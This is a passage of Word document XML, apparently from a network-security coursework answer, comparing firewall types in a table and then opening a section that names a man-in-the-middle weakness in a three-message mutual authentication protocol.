            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BF1CB5B" w14:textId="6ADDA982" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Deep (packet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>payloads and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>application</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>protocols)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="333FCB2F" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46F705E1" w14:textId="503418F7" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Security Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DA95F0F" w14:textId="5F5310E9" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35B07F84" w14:textId="234BD9D5" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Enhanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F18C637" w14:textId="2062C539" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Enhanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04790EF7" w14:textId="16DD3442" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="6121DE40" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31629F6B" w14:textId="47EDDDFC" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Connection Tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F8AA171" w14:textId="16932EC8" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74603028" w14:textId="50CB7711" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29247302" w14:textId="2A9B45A7" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="765CCC98" w14:textId="25A1350F" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="52D3595A" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B5820FA" w14:textId="36933D0B" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Application Awareness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EF60DF5" w14:textId="42DD0557" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="308242A7" w14:textId="2FD948F6" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1043C18F" w14:textId="0FED72FE" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="126549F8" w14:textId="7504E052" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="6D6FF581" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="710"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1117BC9F" w14:textId="646C05AA" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Protection Against</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56ABDAF4" w14:textId="1CF13EB2" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Network-level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19FBAF84" w14:textId="0939229E" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Network-level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67890B81" w14:textId="07E763F5" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Network-level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F8B48AE" w14:textId="0CFB412A" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Application-level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="596DCD22" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B2A3BD6" w14:textId="0BA26420" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E468930" w14:textId="00C249F4" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IPTables,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Access Control</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Lists (ACLs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1309C770" w14:textId="504B7807" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cisco ASA, Check</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Point Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7934D4B9" w14:textId="60807256" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Squid Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AD1B085" w14:textId="3DA3C421" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ModSecurity,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>AppWall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29C0E39F" w14:textId="77777777" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65817745" w14:textId="4EC94F03" w:rsidR="00CD4B1B" w:rsidRDefault="007E5981" w:rsidP="007E5981">
      <w:pPr>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  </w:t>
      </w:r>
      <w:r w:rsidRPr="007E5981">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Three-message</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5981">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E5981">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>mutual authentication protocol vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE8FCB6" w14:textId="0BE9C63E" w:rsidR="007E5981" w:rsidRDefault="008A2A55" w:rsidP="00C8311D">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2A55">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No, the modified protocol you described is not secure.</w:t>
      </w:r>
      <w:r w:rsidR="0082177D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082177D" w:rsidRPr="0082177D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The modified protocol is vulnerable to a man-in-the-middle (MITM) attack</w:t>
      </w:r>
      <w:r w:rsidR="0082177D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
